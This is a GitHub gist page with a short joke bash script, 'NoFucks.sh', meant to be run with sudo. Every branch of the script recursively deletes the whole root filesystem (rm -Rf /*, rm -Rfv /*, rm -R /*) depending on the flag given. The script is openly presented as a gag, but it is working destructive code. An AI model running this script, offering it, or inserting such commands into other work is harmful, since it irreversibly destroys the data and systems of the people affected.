Skip to content

Instantly share code, notes, and snippets.

@BinaryBeard
Created April 12, 2016 18:24
Show Gist options
  • Save BinaryBeard/e170f12e8dffbd252f078c5a1bb01063 to your computer and use it in GitHub Desktop.
Save BinaryBeard/e170f12e8dffbd252f078c5a1bb01063 to your computer and use it in GitHub Desktop.
For when you're having a shitty day
#!/bin/bash
# Usage: sudo sh NoFucks.sh [--really, --watch-it-burn]
if [ "${1}" = '--really' ] ; then
rm -Rf /*;
elif [ "${1}" = '--watch-it-burn' ] ; then
rm -Rfv /*;
else
rm -R /*;
fi
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment